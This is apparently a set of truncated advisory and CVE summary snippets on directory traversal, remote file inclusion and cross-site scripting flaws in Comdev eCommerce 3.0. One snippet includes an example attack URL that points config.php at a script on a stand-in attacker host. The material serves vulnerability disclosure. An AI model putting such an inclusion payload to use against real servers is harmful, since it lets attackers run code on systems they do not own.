CVE-2005-2543

The CVE-2005-2543 entry describes a directory traversal vulnerability in Comdev eCommerce 3.0, specifically in wce.download.php, where the download parameter can be abused with a .. (dot dot) to download arbitrary files. Affected product/component: Comdev eCommerce 3.0 / wce.download.php. Root ca...

CVE-2005-2544

PHP remote file inclusion vulnerability in config.php in Comdev eCommerce 3.0 allows remote attackers to execute arbitrary PHP code via the pathdocroot parameter...

CVE-2005-2544

The CVE-2005-2544 entry concerns Comdev eCommerce 3.0, where a PHP remote file inclusion flaw in config.php allows an attacker to execute arbitrary PHP code via path[docroot]. This is evidenced by multiple sources (NVD/CVE records and a Nessus plugin) describing remote code execution possibilitie...

comdevTraversal.txt

Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The wce.download.php script present in two locations can be passed a "download" http request parameter to download an arbitrary file on the vulnerable server. Example:...

Comdev eCommerce config.php Vulnerability

Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...

Comdev eCommerce 3.0 - index.php Multiple Cross-Site Scripting Vulnerabilities

Comdev eCommerce 3.0 - index.php Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/12382/info Comdev eCommerce is reported prone to multiple cross-site scripting vulnerabilities. These may facilitate theft of cookie-based authentication credentials as well as...